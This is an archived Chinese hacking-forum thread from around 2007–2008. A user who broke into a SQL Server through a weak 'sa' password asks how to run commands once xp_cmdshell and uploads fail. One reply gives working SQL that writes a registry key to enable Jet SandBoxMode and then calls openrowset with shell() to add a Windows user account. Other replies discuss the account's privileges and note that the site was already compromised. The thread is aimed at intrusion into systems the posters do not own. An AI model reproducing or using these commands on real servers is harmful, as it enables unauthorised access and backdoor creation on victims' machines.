[讨论]sa的老问题发图讨论之前的老文章方法(页 1) - 技术交流 - 【3.A.S.T】网络安全爱好者 -- 网络安全，势在必行

valen886 发表于 2008-7-23 08:32

[讨论]sa的老问题发图讨论之前的老文章方法

[讨论]sa的老问题发图讨论之前的老文章方法
议题作者：小猪！
信息来源：邪恶八进制信息安全团队（[url=http://www.eviloctal.com/]www.eviloctal.com[/url]）

今天遇到个sa的弱口令搞了下，下面的图是搞的结果！
得到的结果是cmd用不了，上传也用不了！分离器命令不行！还有就是今天看到有个朋友用分离器执行了命令，然后3389SHIFT5次也不行！
不知道大峡们有什么好的方法没？
[img]http://forum.eviloctal.com/images/default/attachimg.gif[/img]  [img]http://forum.eviloctal.com/attachments/Mon_0712/58_148157_f3e71db46b02be5.jpg[/img] [img]http://forum.eviloctal.com/images/attachicons/image.gif[/img][url=http://forum.eviloctal.com/attachment.php?aid=10810&nothumb=yes]都大.jpg[/url] (1.6 MB)

2007-12-3 16:16[img]http://forum.eviloctal.com/images/default/attachimg.gif[/img]  [img]http://forum.eviloctal.com/attachments/Mon_0712/58_148157_f166354e1e604ad.jpg[/img] [img]http://forum.eviloctal.com/images/attachicons/image.gif[/img][url=http://forum.eviloctal.com/attachment.php?aid=10811&nothumb=yes]未命名.jpg[/url] (312 KB)

2007-12-3 16:16[img]http://forum.eviloctal.com/images/default/attachimg.gif[/img]  [img]http://forum.eviloctal.com/attachments/Mon_0712/58_148157_4d5c2b468da2f43.jpg[/img] [img]http://forum.eviloctal.com/images/attachicons/image.gif[/img][url=http://forum.eviloctal.com/attachment.php?aid=10812&nothumb=yes]的命名.jpg[/url] (872 KB)

2007-12-3 16:16[img]http://forum.eviloctal.com/images/default/attachimg.gif[/img]  [img]http://forum.eviloctal.com/attachments/Mon_0712/58_148157_bf53edeea19560a.jpg[/img] [img]http://forum.eviloctal.com/images/attachicons/image.gif[/img][url=http://forum.eviloctal.com/attachment.php?aid=10813&nothumb=yes]未都大名.jpg[/url] (1.35 MB)

2007-12-3 16:16[img]http://forum.eviloctal.com/images/default/attachimg.gif[/img]  [img]http://forum.eviloctal.com/attachments/Mon_0712/58_148157_528df4c77cced10.jpg[/img] [img]http://forum.eviloctal.com/images/attachicons/image.gif[/img][url=http://forum.eviloctal.com/attachment.php?aid=10814&nothumb=yes]未命名22.jpg[/url] (1.73 MB)

2007-12-3 16:16
帖子3 精华[url=http://forum.eviloctal.com/digest.php?authorid=148157]0[/url] 积分16 阅读权限40 在线时间1 小时注册时间2007-11-12 最后登录2008-5-10 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=148157]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=猎头&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]您知道您年薪应是多少?[/url]

[url=http://forum.eviloctal.com/space-uid-80082.html]沉渊[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

鸥飞007 发表于 2008-7-23 08:32

权限问题，貌似你这根本就不是saDreamless world……
帖子25 精华[url=http://forum.eviloctal.com/digest.php?authorid=80082]0[/url] 积分179 阅读权限40 性别男在线时间215 小时注册时间2007-2-11 最后登录2008-6-30 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=80082]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=兼职&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]赚更多的钱[/url]

[url=http://forum.eviloctal.com/space-uid-15235.html]逗号[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

shirley 发表于 2008-7-23 08:32

先 select user 一下，看看是不是 dbo 要是的话，就开启沙盘模式搞他
不用xp_cmdshell 执行命令
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user xxxxx xxxx /add")')
帖子35 精华[url=http://forum.eviloctal.com/digest.php?authorid=15235]0[/url] 积分114 阅读权限40 在线时间30 小时注册时间2005-10-16 最后登录2008-5-22 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=15235]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=干洗店加盟&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]少女暴富的隐秘（图）[/url]

[url=http://forum.eviloctal.com/space-uid-15235.html]逗号[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

大圣发表于 2008-7-23 08:32

实践证明，你的那个用户为GUEST 权限
不过，好像已经有人拿下了这个站。鬼知道是哪里的黑客~！
帖子35 精华[url=http://forum.eviloctal.com/digest.php?authorid=15235]0[/url] 积分114 阅读权限40 在线时间30 小时注册时间2005-10-16 最后登录2008-5-22 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=15235]查看详细资料[/url]TOP

[url=http://forum.eviloctal.com/space-uid-13931.html]charley008[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

bobby 发表于 2008-7-23 08:32

沙盒模式在2003下也有用吗？
帖子16 精华[url=http://forum.eviloctal.com/digest.php?authorid=13931]0[/url] 积分53 阅读权限40 在线时间33 小时注册时间2005-10-2 最后登录2008-7-7 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=13931]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]

[url=http://forum.eviloctal.com/space-uid-30458.html]wolfluxay[/url] [img]http://forum.eviloctal.com/images/avatars/pw/male2.gif[/img]
晶莹剔透§烈日灼然

页: [1]

【3.A.S.T】网络安全爱好者's Archiver

[讨论]sa的老问题 发图讨论之前的老文章方法

[讨论]sa的老问题发图讨论之前的老文章方法